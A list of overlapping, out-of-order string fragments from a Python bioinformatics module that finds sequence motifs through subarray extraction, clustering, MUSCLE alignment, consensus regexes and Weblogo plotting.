"as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters,",
"Weblogo(object): \"\"\"A wrapper of weblogolib for creating sequence.\"\"\" def __init__(self, output_format='png', # ['eps','png','png_print','jpeg']",
"\"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack)) size = len(haystack) return counts, float(counts) / size",
"fname + '\" style=\"width: 100%\"></p>') else: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://'",
"0] = 0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if fname:",
"ids is None: ids = [id for id in motives] seqs_summary = defaultdict(list)",
"id2 in c[:, 0:2]: if id1 < len(cluster_seqs): orders.append(int(id1)) if id2 < len(cluster_seqs):",
"orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list = [] for i, row in enumerate(cooccurence_mtx): norm =",
"%d (#%d) (%.2f secs)' % (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives computation, %d motives'",
"loc_start_time size = pos_data_matrix.shape logger.debug('%d %s (%.2f secs) (delta: %.2f)' % (i, size,",
"(%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() preds =",
"motif finder algorithm. @author: <NAME> @email: <EMAIL> \"\"\" import logging import multiprocessing as",
"= np.median([len(s) for h, s in seqs]) sigs = None for scores in",
"return wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\"",
"Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options) if",
"(len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\" y",
"%d motives' % len(_motives)) return _motives def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5,",
"motives[cluster_id]['freq'] info = ' - num occurrences of regex: %d' % (co) txt.append(info)",
"= \"\" line_str = str(line) yield line_str.strip() else: line_str = line.split() if line_str:",
"wbl.std_color_schemes[color_scheme] options.resolution = resolution if fineprint: options.fineprint = fineprint self.options = options self.output_format",
"pwd = os.getcwd() url = pwd + '/' + fname txt = []",
"letter, count in k: if count / float(size) > regex_th: if letter !=",
"neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except Exception as e: logger.debug('Failed iteration. Reason: %s'",
"row in enumerate(cluster.T): c = Counter(row) k = c.most_common() code = '' for",
"distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' * 100) else: logger.warning( 'No",
"secs' % (time.time() - start_time)) logger.debug('Annotating') start_time = time.time() subarrays_items = [] for",
"plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign = np.copy(sig) sign[sign >= 0] = 0 plt.bar(range(len(sign)),",
"= time.time() - loc_start_time logger.debug('%d (%.2f secs) (delta: %.2f)' % (i, d_time, d_loc_time))",
"end, p, subseq in iterable: new_header = header new_header += '<loc>' + str(begin)",
"= 1 - y return p_val def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences",
"%d motives' % len(self.clusters)) return self.clusters except Exception as e: logger.debug('Failed iteration. Reason:",
"ecdf(self, x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1, len(xs)",
"seqs in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Vectorizing') start_time",
"pool = mp.Pool() else: pool = mp.Pool(n_jobs) pos_results = [apply_async( pool, serial_pre_process, args=(seqs,",
"self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter( seqs, motives,",
"not clusters: raise Exception('Error: No clusters.') mcs = min_cluster_size logger.debug('Alignment') motives = dict()",
"time.time() # align with muscle is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs,",
"logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info = ' - num",
"matrix cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test,",
"- start_time)) logger.debug('Performance evaluation') start_time = time.time() preds = [] binary_preds = []",
"elif self.output_format == 'jpeg': return wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------",
"occurrences of regex: %.2f' % (fr) txt.append(info) av = motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos']",
"the predictor to learn the new class definition logger.debug('After merge, %d motives' %",
"num subarrays: %d' % len(motif['seqs']) logo_txt.append(info) info = ' - consensus sequence: %s'",
"pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except Exception as e: logger.debug('Failed iteration. Reason:",
"= estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time",
"ids = [id for id in motives] seqs_summary = defaultdict(list) for seq_id, begin,",
"= logging.getLogger(__name__) def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return 1 / (1 + np.exp(-(x",
"s[start:end]) def plot_cumulative_score(smod, seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod) plt.figure(figsize=size)",
"yield 1 else: yield 0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack))",
"ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size) else: sample_seqs",
"logger.debug('val:%.1f beg:%s end:%s width:%s' % (val, start, end, width)) for h, s in",
"complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity =",
"diags=False, maxiters=16, maxhours=None, # TODO: check if this alphabet is required # it",
"min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size: return True else: return",
"rel_nw_score > similarity_th: yield rel_nw_score, i, j def merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5,",
"in enumerate(results): loc_start_time = time.time() subarrays_item = p.get() subarrays_items += subarrays_item d_time =",
"rel_nw_score, i, j def merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\"",
"self.output_format == 'png_print': return wbl.png_print_formatter(data, format) elif self.output_format == 'jpeg': return wbl.jpeg_formatter(data, format)",
"score = header.split('<score>')[1] score = float(score) loc = header.split('<loc>')[1] begin, end = loc.split(':')",
"for i in range(len(ids) - 1): start = ids[i] end = ids[i +",
"self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.merge( motives, similarity_th=similarity_th, min_score=min_score,",
"(i, size, d_time, d_loc_time)) pool.close() pool.join() preds = np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets",
"logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred))) except Exception as e:",
"for (orig_header, orig_seq), (seq, score) in zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq, score=score,",
"instances' % data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else:",
"occurrences of regex: %d' % (co) txt.append(info) info = ' - freq of",
"e) logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b = -4, 1 scores",
"len(cluster_seqs): orders.append(int(id1)) if id2 < len(cluster_seqs): orders.append(int(id2)) return orders def _compute_consensus_seq(self, align_seqs): cluster",
"motives: if j > i: seq_i = motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score =",
"def _compute_consensus_seq(self, align_seqs): cluster = [] for h, align_seq in align_seqs: str_list =",
"scores d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time logger.debug('%d (%.2f",
"for cluster_id in clusters: if len(clusters[cluster_id]) > 0: seqs = [s for h,",
"txt.append(info) if len(ds): figname = plot_distance( cluster_id, j, regex_i, regex_j, distances, nbins=nbins, size=size,",
"= motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif = self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th,",
"c = Counter(row) k = c.most_common() code = '' for i, row in",
"_save_logo(self, logo, cluster_id, fname): imagename = '%s_logo_cl_%d.png' % (fname, cluster_id) with open(imagename, 'wb')",
"%d != %d' % (len(sig), median_len)) if sigs is None: if len(sig) >=",
"= max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size = neg_block_size self.n_jobs = n_jobs self.vectorizer =",
"[] for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix =",
"sample_size=sample_size) if is_high_quality: info1 = 'Joining: %d (#%d), %d (#%d) score: %.2f' %",
"chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Annotating') start_time = time.time()",
"for i in range(half_windw_size, sig_len - half_windw_size): min_sig = np.min(sig[i - half_windw_size:i +",
"h, s in seqs: if s[start:end]: yield (h, s[start:end]) def plot_cumulative_score(smod, seqs, size=(6,",
"(self.a, self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\" y = sigmoid(value, self.a, self.b) p_val =",
"min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives",
"logger.debug('working on %d instances' % data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds",
"): \"\"\"Initialize an instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type = sequence_type",
"output_format def create_logo(self, seqs=[]): \"\"\"Create sequence logo for input sequences.\"\"\" # seperate headers",
"while True: items = [] for i in range(n): it = iterable.next() items.append(it)",
"dict() for cluster_id in ids: logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] =",
"cumulative distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state self.a = -4 self.b",
"seq_j, gap_penalty=-1) rel_nw_score = 2 * nw_score / (len(seq_i) + len(seq_j)) if rel_nw_score",
"= sep.join(seqs) cluster_seqs.append(seq) # vectorize the seqs and compute their gram matrix K",
"= header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return orig_header, score, begin, end, subseq def decompose(self,",
"= 1 - y return p_val def ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\" xs",
"0 to_be_removed = [] for i, row in enumerate(cluster.T): c = Counter(row) k",
"self.ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b = popt else: logger.debug('Warning:",
"compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is None: ids = [id for id in",
"import logging import multiprocessing as mp import os from collections import defaultdict from",
"merge, %d motives' % len(motives)) return motives def quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None):",
"= 0 return avg_loc, std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\" for i in ids:",
"bins, patches = plt.hist( ds, nbins, normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs %s'",
"from sklearn.linear_model import SGDClassifier from sklearn.cluster import MiniBatchKMeans from eden.sequence import Vectorizer from",
"= ' - average location: %.1f +- %.1f' % (av, st) txt.append(info) txt.append(self._wrap_image(figname,",
"fill_width=True, output_type='screen'): pwd = os.getcwd() url = pwd + '/' + fname txt",
"= ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs)",
"headers headers, instances = [list(x) for x in zip(*seqs)] instances_seqrecord = [] for",
"/ (len(seq_i) + len(seq_j)) if rel_nw_score > similarity_th: yield rel_nw_score, i, j def",
"- 1): start = ids[i] end = ids[i + 1] width = end",
"obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit( pos_seqs,",
"(header, seq) subseqs.append(subseq) subarrays_items += subseqs return subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5,",
"in motives: if j > i: seq_i = motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score",
"def _wrap_image(self, fname, fill_width=True, output_type='screen'): pwd = os.getcwd() url = pwd + '/'",
"pred, seq in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d motives' % len(self.clusters)) return",
"for i, a in enumerate(align_seq) if i not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return",
"line.split() if line_str: seq += str(line_str[0]).strip() if seq: yield seq # ------------------------------------------------------------------------------ class",
"= occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] = counts avg, std = extract_location(regex_seq,",
"markdown format.\"\"\" txt = [] if motives: _, norm_cooccurence_mtx, distances = compute_cooccurence(motives) info",
"estimator, min_subarray_size, max_subarray_size)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time()",
"def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable = iter(iterable) while True: items = [] for",
"code_str = code[0] else: code_str = '(' + '|'.join(code) + ')' return code_str",
"= sum(find_occurrences(needle, haystack)) size = len(haystack) return counts, float(counts) / size def extract_consensus(seqs,",
"xs, ys = ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b =",
"\\ (i, n_i, j, n_j, rel_nw_score) info2 = ' deleting: %d [%d is",
"compute_max_subarrays_sequence from itertools import izip import time from sklearn.base import BaseEstimator, ClassifierMixin from",
"return zip(headers, motif_seqs) def transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs)",
"True: ms = sorted([m for m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success =",
"- num subarrays: %d' % len(motif['seqs']) logo_txt.append(info) info = ' - consensus sequence:",
"p_value=p_value) motives = self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.merge(",
"scores: xs, ys = ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b",
"min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq",
"= len(haystack) return counts, float(counts) / size def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for",
"in haystack: matches = re.findall(needle, s, overlapped=True) if len(matches): yield 1 else: yield",
"self.diags = diags self.maxiters = maxiters self.maxhours = maxhours if alphabet == 'protein':",
"format) elif self.output_format == 'png_print': return wbl.png_print_formatter(data, format) elif self.output_format == 'jpeg': return",
"PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid on the empirical cumulative distribution.\"\"\" def __init__(self, random_state=1):",
"= [] if fill_width: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url",
"* 2) # join all sequences in a cluster with enough space that",
"options self.output_format = output_format def create_logo(self, seqs=[]): \"\"\"Create sequence logo for input sequences.\"\"\"",
"%.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines):",
"k[1][1] else: val = k[0][1] if float(val) / dim >= min_freq: score +=",
"plt.close() return figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for i in",
"median_len)) if sigs is None: if len(sig) >= median_len: sigs = sig[:median_len] else:",
"(dtime)) self.clusters = defaultdict(list) for pred, seq in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering,",
"vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except Exception as e: logger.debug('Failed iteration. Reason:",
"seqs = [s for h, s in clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq) #",
"= motives[cluster_id]['regex_seq'] figname = plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type))",
"stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info = ' -",
"k: if count / float(size) > regex_th: if letter != '-': code.append(letter) if",
"trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size: return",
"self.clusterer = clusterer self.clusterer_is_fit = False def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1)",
"in subarrays_items: yield self._decompose_header(header) except Exception as e: logger.debug('Failed iteration. Reason: %s' %",
"= re.findall(needle, s, overlapped=True) if len(matches): yield 1 else: yield 0 def occurrences(needle,",
"- start_time)) logger.debug('Fitting') start_time = time.time() for i, (p, n) in enumerate(izip(pos_results, neg_results)):",
"consensus regex: %s' % motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt def compute_logos(self, motives, ids=None):",
"(fname, cluster_id) with open(imagename, 'wb') as f: f.write(logo) return imagename def _wrap_image(self, fname,",
"sample_size=sample_size) motives = self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th) return motives def compute_logo(self, cluster_id=None,",
"pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_pre_process, args=(seqs,",
"i in cluster_ids: for j in cluster_ids: cooccurence_mtx[i, j] += 1 if i",
"\"\"\"hits.\"\"\" for i in ids: for h, s in motives[i]['seqs']: tokens = h.split('<loc>')",
"logger.debug('After merge, %d motives' % len(motives)) return motives def quality_filter(self, seqs=None, motives=None, freq_th=None,",
"cluster = [] for h, align_seq in align_seqs: str_list = [c for c",
"figname = plot_cumulative_score( self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id in",
"' - num subarrays: %d' % len(motif['seqs']) logo_txt.append(info) info = ' - consensus",
"n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix])",
"+= [-1] * neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred",
"_motives def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None):",
"patches = plt.hist( ds, nbins, normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs %s' %",
"= mp.Pool(n_jobs) results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(iterable,",
"return logo_image, logo_txt def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if motives: if ids is",
"else: figname = None plt.show() plt.close() return figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len",
"<EMAIL> \"\"\" import logging import multiprocessing as mp import os from collections import",
"ids[i + 1] width = end - start val = sum(sig[start:end]) yield val,",
"= end - start val = sum(sig[start:end]) yield val, start, end, width def",
"list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] * len(headers) for i in range(len(out[:-1]))[::2]: id = int(out[i].split('",
"aligned_seqs = self._fasta_to_seqs(headers, stdout) return aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper of",
"matrix:') logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test,",
"list(mean_shift_decomposition(sig, half_windw_size)) for i in range(len(ids) - 1): start = ids[i] end =",
"f.write(logo) return imagename def _wrap_image(self, fname, fill_width=True, output_type='screen'): pwd = os.getcwd() url =",
"as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def score(self, seqs=None):",
"similarity_th=similarity_th)], reverse=True) success = False for rel_nw_score, i, j in ms: if motives.get(i,",
"= s + (e - s) / 2 locs.append(m) plt.figure(figsize=size) n, bins, patches",
"(i, size, d_time, d_loc_time)) pool.close() pool.join() data_matrix = vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable,",
"pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size))",
"# TODO: run the predictor to learn the new class definition logger.debug('After merge,",
"e = match.end() m = s + (e - s) / 2 locs.append(m)",
"yield freq, id, c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17, 2),",
"* pos_data_matrix.shape[0] neg_data_matrix = n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y)",
"logos = dict() for cluster_id in ids: logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id])",
"== abs(c_i - c_j): selected = c_i - c_j distances[(i, j)].append(selected) cooccurence_mtx =",
"1 cooccurence_mtx = np.zeros((size, size)) for seq_id in sorted(seqs_summary): cluster_ids = [cluster_id for",
"del motives[j] success = True if success is False: break # TODO: run",
"* len(headers) for i in range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i",
"< 0] = 0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign = np.copy(sig) sign[sign >=",
"def fit(self, scores): \"\"\"fit.\"\"\" if scores: xs, ys = self.ecdf(scores) popt, pcov =",
"p.get() matrices += pos_data_matrix d_time = time.time() - start_time d_loc_time = time.time() -",
"= MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size) else: sample_seqs =",
"a) / b)) class PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid on the empirical cumulative",
"figname = '%s_loc_%d.png' % (fname, cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname",
"!= %d' % (len(sig), median_len)) if sigs is None: if len(sig) >= median_len:",
"chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Predicting') start_time = time.time()",
"sample_size) else: sample_seqs = seqs align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq)",
"Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _decompose_header(self,",
"tokens = h.split('<loc>') seq_id = tokens[0] begin, end = tokens[1].split(':') yield (seq_id, int(begin),",
"min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size)",
"= IUPAC.protein elif alphabet == 'rna': self.alphabet = IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna",
"logo_range: options.logo_start = logo_range[0] options.logo_end = logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars = error_bars",
"if motives: if ids is None: ids = [cluster_id for cluster_id in motives]",
"= self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt) return logos else: logger.warning( 'No",
"e) logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters, complexity=3): sep = ' ' * (complexity",
"for c_j in centers[j]: if selected_abs == abs(c_i - c_j): selected = c_i",
"Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c = linkage(gram_matrix, method='single') orders = []",
"len(subsequences) / n data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on",
"logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\"",
"'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\" style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img",
"d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time logger.debug('%d (%.2f secs)",
"line_str = line.split() if line_str: seq += str(line_str[0]).strip() if seq: yield seq #",
"pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except Exception as",
"j in motives: regex_i = motives[i]['regex_seq'] if j != cluster_id: regex_j = motives[j]['regex_seq']",
"p_val = 1 - y return p_val def ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\"",
"y_pred, y_binary, y_test = multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) #",
"in enumerate(align_seq) if i not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs def",
"is now #%d]' % \\ (j, i, n_i + n_j) logger.debug(info1 + info2)",
"classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred))) except Exception",
"yield score except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception',",
"i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() code = ''",
"== 0: code_str = None elif len(code) == 1: code_str = code[0] else:",
"motives[i]['regex_seq'] if j != cluster_id: regex_j = motives[j]['regex_seq'] ds = distances[(cluster_id, j)] info",
"regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs} return True, motif else: return False,",
"mp import os from collections import defaultdict from eden import apply_async import numpy",
"%.2f secs' % (time.time() - start_time)) logger.debug('Fitting') start_time = time.time() for i, (p,",
"/ 2 locs.append(m) if locs: avg_loc = np.percentile(locs, 50) std_loc = np.percentile(locs, 70)",
"pool.join() return scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq = \"\" for line in",
"== -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool,",
"options.show_ends = show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution = resolution if fineprint: options.fineprint =",
"= 'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, #",
"= np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets = np.hstack(true_targets) return preds, binary_preds, true_targets def",
"= header.split('<loc>')[1] begin, end = loc.split(':') begin = int(begin) end = int(end) subseq",
"else: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\"></p>') else:",
"min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size:",
"min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs =",
"orig_header = header.split('<loc>')[0] return orig_header, score, begin, end, subseq def decompose(self, seqs=None, p_value=0.05):",
"iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items",
"input sequences.\"\"\" # seperate headers headers, instances = [list(x) for x in zip(*seqs)]",
"> min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq': consensus_seq,",
"d_loc_time = time.time() - loc_start_time logger.debug('%d (%.2f secs) (delta: %.2f)' % (i, d_time,",
"logger.debug('%d (%.2f secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return scores_items",
"/ float(len(xs)) return xs, ys def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code = []",
"instance.\"\"\" self.diags = diags self.maxiters = maxiters self.maxhours = maxhours if alphabet ==",
"regex as re from collections import Counter from sklearn import metrics from eden.util.NeedlemanWunsh",
"yield seq seq = \"\" line_str = str(line) yield line_str.strip() else: line_str =",
"if title: options.title = title if figure_label: options.logo_label = figure_label options.show_xaxis = show_x_axis",
"p_value.') logger.debug('Working on: %d fragments' % len(subsequences)) n = multiprocessing.cpu_count() pos_block_size = len(subsequences)",
"logger.debug('Annotating') start_time = time.time() subarrays_items = [] for i, p in enumerate(results): loc_start_time",
